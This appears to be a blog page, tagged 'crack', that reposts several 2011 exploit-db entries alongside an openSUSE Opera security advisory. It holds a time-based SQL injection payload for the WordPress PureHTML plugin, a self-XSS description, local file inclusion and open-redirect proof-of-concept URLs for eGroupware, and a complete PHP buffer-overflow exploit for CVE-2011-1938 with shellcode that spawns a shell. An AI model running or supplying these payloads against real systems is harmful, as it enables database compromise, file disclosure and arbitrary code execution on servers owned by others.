Tag: crack

WordPress PureHTML plugin <= 1.0.0 SQL Injection

by OwnServer


# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

—————
Vulnerable code
—————
if(!isset($_POST[‘PureHTMLNOnce’])){
if ( !db_unx_verify_nonce( $_POST[‘PureHTMLNOnce’], plugin_basename(__FILE__) )) {header(“location:”.$refer);}
}
else{

if(isset($_POST[‘id’])){$id = $_POST[‘id’];}else{$id=’0′;}

$action = $_POST[‘action’];

#delete
if($action == “delete”){
$sql = “delete from “.$wpdb->prefix.”pureHTML_functions WHERE id='”.$id.”‘”;
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17758/

Exploit for WordPress core 3.1.3 Persistent SELF XSS Vulnerability

by OwnServer

Title: WordPress core 3.1.3 self-XSS

Author: Jelmer de Hen
Software link: http://wordpress.org/download/Version: 3.1.3
WordPress 3.1.3 has a self-XSS vulnerability in the following pages:/wp-admin/user-edit.php?user_id=<uid>/wp-admin/profile.php
By putting Javascript inside the input elements "first_name", "last_name" or "nickname" the self-XSS will trigger 3 times.

More information: http://h.ackack.net/0day-xss-in-wordpress-core.html

 

Fonte: http://www.exploit-db.com/exploits/17454/

Vulnerabilidade do Opera Browser no Opensuse 11.x

by OwnServer
From: opensuse-security@opensuse.org
To: opensuse-security-announce@opensuse.org
Subject: [security-announce] openSUSE-SU-2011:0688-1: important: opera
Date: Fri, 24 Jun 2011 15:08:26 +0200 (CEST)
Message-ID: <20110624130826.38F8A32350@maintenance.suse.de>

openSUSE Security Update: opera ______________________________________________________________________________ Announcement ID: openSUSE-SU-2011:0688-1 Rating: important References: #694567 Affected Products: openSUSE 11.4 openSUSE 11.3 ______________________________________________________________________________ An update that contains security fixes can now be installed. It includes one version update.

Description: opera 11.11 fixes a security vulnerability.

Citing http://www.opera.com/support/kb/view/992/:

Framesets allow web pages to hold other pages inside them.

Certain frameset constructs are not handled correctly when the page is unloaded, causing a memory corruption.

To inject code, additional techniques will have to be employed. Patch Instructions:

To install this openSUSE Security Update use YaST online_update.

Alternatively you can run the command listed for your product:

– openSUSE 11.4: zypper in -t patch opera-4588 – openSUSE 11.3: zypper in -t patch opera-4588 To bring your system up-to-date, use “zypper patch”. Package List: – openSUSE 11.4 (i586 x86_64) [New Version: 11.11]: opera-11.11-1.2.1 opera-gtk-11.11-1.2.1 opera-kde4-11.11-1.2.1

– openSUSE 11.3 (i586 x86_64) [New Version: 11.11]: opera-11.11-1.2.1 opera-gtk-11.11-1.2.1 opera-kde4-11.11-1.2.1

References: https://bugzilla.novell.com/694567

Fonte: http://lwn.net/Articles/449150/

eGroupware 1.8.001.20110421 Multiple Vulnerabilities

by OwnServer

------------------------------------------------------------------------

Software................eGroupware 1.8.001.20110421
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.egroupware.org/
Discovery Date..........5/19/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in eGroupware 1.8.001.20110421
can be exploited to include arbitrary files.
--PoC--
http://localhost/egroupware/admin/remote.php?uid=a&type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg&creator_email=a
------------------------------------------------------------------------
Software................eGroupware 1.8.001.20110421
Vulnerability...........Open Redirect
Threat Level............Low (1/5)
Download................http://www.egroupware.org/
Discovery Date..........5/19/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
An open redirect in eGroupware 1.8.001.20110421 can be exploited to
redirect users to an arbitrary URL.
--PoC--

http://localhost/egroupware/phpgwapi/ntlm/index.php?forward=http://www.autosectools.com/

 

Fonte: http://www.exploit-db.com/exploits/17322/

PHP inferior ou igual a 5.3.5 socket_connect() Buffer Overflow Vulnerability

by OwnServer

<?php

// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go...\n";
define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE =
"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0".
"\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1".
"\xcd\x80";
echo "[+] creating the sled.\n";
$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
$i < strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}
$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)\n";
$var85 = socket_connect($var79,$b);

?>

 

fonte: http://www.exploit-db.com/exploits/17318